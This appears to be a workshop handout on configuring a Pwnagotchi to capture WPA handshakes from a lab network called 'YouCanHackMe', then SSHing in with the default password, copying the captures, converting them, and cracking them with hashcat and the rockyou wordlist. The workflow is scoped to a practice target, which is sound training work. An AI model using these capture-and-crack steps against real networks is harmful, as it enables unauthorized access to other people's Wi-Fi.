Here's some info you'll need for this meeting!

In addition to the hardware requirements listed here, you'll also need the 7MS custom config file.

To be safe and not aggressively enumerate networks we don't have permission for, what we're going to do is whitelist ALL networks in the airspace EXCEPT the 'YouCanHackMe' network. So we'll run this command to do that:

nmcli dev wifi list | awk '{print $1}' | sort > ssids.txt

Walk around the area you'll be doing testing in and run this command multiple times to get a big list of SSIDs. Now, keep in mind that after you do all this, your ssids.txt file will have tons of dupes in it. Run this command to create a list of just unique SSIDs:

awk '{$1=$1;print}' ssids.txt | sort | uniq > unique-ssids.txt

This will spit out a list of unque SSIDs. Copy them ALL into the config file and paste them so they're formatted like so:

  name: '7MSagotchi'
    - 'YourHomeNetworkMaybe'
    - '7MS'
    - 'DIRECT-03-HP'
    - 'DIRECT-59-HP'
    - 'HP-Print-02-Officejet'
    - 'HP-Print-C9-Officejet'
    - 'Integra'
    - 'IN-USE'
    - 'iWMS'
    - 'NB100-25-08-46'
    - 'NETGEAR19'
    - 'NLC-WiFi'
    - 'Nuvera'
    - 'PLAY'
    - 'PLAY-guest'
    - 'Stella'
      enabled: true
      report: true
        - 'YourHomeNetworkMaybe'

      enabled: true
      type: 'waveshare_2'
      color: 'black'

Be sure to change the display type to match the display you actually have!

Once your Pwnagotchi is booted and captures the desired handshake, unplug it from power and the connect it via USB to your workstation using the second USB connector on the Pwnagotchi (the second one in from the edge of the device).

The Pwnagotchi should show up as a network device, and then you can set your local properties to:

Subnet mask:

Once that's complete, you should be able to ping

Now SSH in with:

ssh pi@

Password is raspberry

Now change to the root user by typing:

sudo -i

Type in the raspberry password again.

Now change to the handshakes directory:

cd /root/handshakes

Now you should see a list of all captured handshakes.

Copy them to the pi user's home folder:

cp *.pcap /home/pi

Now using FileZilla or similar SCP/SFTP program, copy the handshakes over to your desktop with hashcat installed.

Convert the handshake to a format hashcat can understand with:

/usr/lib/hashcat-utils/cap2hccapx.bin name-of-handshake.cap name-of-converted-file.hccapx

Now the handshake is ready to crack!

hashcat -m 2500 ./name-of-converted-file.hccapx /usr/share/wordlists/rockyou.txt --force

Have fun!